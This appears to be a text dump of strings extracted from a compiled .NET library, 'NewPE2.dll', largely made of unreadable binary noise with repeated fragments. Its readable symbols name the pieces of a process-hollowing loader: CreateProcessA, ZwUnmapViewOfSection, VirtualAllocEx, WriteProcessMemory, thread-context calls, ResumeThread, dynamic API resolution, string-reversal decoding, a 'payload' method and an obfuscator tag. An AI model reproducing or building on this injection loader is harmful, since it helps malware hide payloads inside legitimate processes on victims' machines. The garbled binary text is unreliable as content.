!This program cannot be run in DOS mode.
`.rsrc
@.reloc
ToInt16
ToInt32
rdYaff%
eQa cu
x"YaZ m~'
aaXXXZYeX
1vYeaZf w
;Ye /A$
ZfXZaX
ufaeY%
$ZY )s
Yfaee c6
Zae !`XDfefY 9N/
7Yf R<smffaaX
CeZYZe
afYeX
* effa
<YQafX w
.PNZY
aeYfZYe
DxeeXa
Za bI`
|ZYeXa
:nZYe
YZY ;y
aeaY #G
aXf SB+
XZaeeaaff t>*
YfYf [
-afX #?["Z
$$`ZZYe
XDZ $bC1a8
\rCmZ
Z LG}za8
j[8a8$
afeXXff
WeXYe y
X) AIL
CY qe@
ufeXX
GZXZeaYYY
(Zeef ?
|fXYff%
wVZ q#R
afeXXff
WeXYe y
X) AIL
CY qe@
ufeXX
GZXZeaYYY
(Zeef ?
|fXYff%
/ _^E_
>Js?%&
JZ Lu@
?OlZ T
/ DUEpZ
8D22%&
L}Z !M
"=Za8z
afeXXff
WeXYe y
X) AIL
CY qe@
ufeXX
GZXZeaYYY
(Zeef ?
|fXYff%
afeXXff
WeXYe y
X) AIL
CY qe@
ufeXX
GZXZeaYYY
(Zeef ?
|fXYff%
aef mg!
ZXZXa M
f;offZ u
_XXXfYaa !
ZaXa e
5ZeX W
zZYeXa
ZeZeaY
aeZZaf%
RYaaYXe
zXYX /
^xiZY
ZZefY .
{"eX 7
eZYf 'v
qafaeY%
Z eF2/
.aaYfXefY
ZfYaX Yb
Zeef g
aXeaa {#s
X{feX
YXfXa
v4.0.30319
#Strings
NewPE2.dll
<Module>
.cctor
NewPE2
mscorlib
Object
System
DelegateResumeThread
MulticastDelegate
object
method
Invoke
handle
BeginInvoke
IAsyncResult
AsyncCallback
callback
EndInvoke
result
DelegateWow64SetThreadContext
thread
context
DelegateSetThreadContext
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateVirtualAllocEx
address
length
protect
DelegateWriteProcessMemory
process
baseAddress
buffer
bufferSize
bytesWritten
DelegateReadProcessMemory
bytesRead
DelegateZwUnmapViewOfSection
DelegateCreateProcessA
applicationName
commandLine
processAttributes
threadAttributes
inheritHandles
creationFlags
environment
currentDirectory
startupInfo
processInformation
ProcessInformation
ValueType
ProcessHandle
ThreadHandle
ProcessId
ThreadId
StartupInformation
Reserved1
Desktop
Reserved2
StdInput
StdOutput
StdError
Native
Kernel32
RsmThread
Wow64SetThreadCtx
SetThreadCtx
Wow64GetThreadCtx
GetThreadCtx
VirtualAllcEx
WriteProcessMem
ReadProcessMem
ZwUnmapViewOfSec
CreateProcA
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
LoadLibraryA
kernel32
GetProcAddress
hProcess
LoadApi
CreateApi
Execute
payload
ReverseString
BinaryToString
<PrivateImplementationDetails>
23091FDFCA65D98CD7E6CDD7E4207E98035057E8168097525495410CEE4469B7
9A211BE544A8FBEE0D0F761E9FDB3EC75F389FCF6E250DA114AE7558639C92B6
__StaticArrayInitTypeSize=7
ConfusedByAttribute
Attribute
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
RuntimeCompatibilityAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
AssemblyTitleAttribute
System.Reflection
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
CompilerGeneratedAttribute
GetTypeFromHandle
RuntimeTypeHandle
Marshal
GetDelegateForFunctionPointer
Delegate
Convert
ToString
String
StringSplitOptions
Encoding
System.Text
get_Default
RuntimeHelpers
InitializeArray
RuntimeFieldHandle
GetString
SizeOf
UInt32
Exception
ToInt32
BitConverter
GetMethod
MethodInfo
MethodBase
IntPtr
Microsoft.VisualBasic
Interaction
CallByName
CallType
GetBytes
get_Size
ToInt16
Buffer
BlockCopy
Process
GetProcessById
Strings
StrReverse
Substring
ToByte
Replace
System.Text.RegularExpressions
get_ASCII
get_Length
198-Protector v4.0-Stressed
WrapNonExceptionThrows
NewPE2
Copyright
2022
$93836e84-1d33-4fcf-a590-27e36c5cdf8e
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorDllMain
mscoree.dll
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
NewPE2
FileVersion
1.0.0.0
InternalName
NewPE2.dll
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
NewPE2.dll
ProductName
NewPE2
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0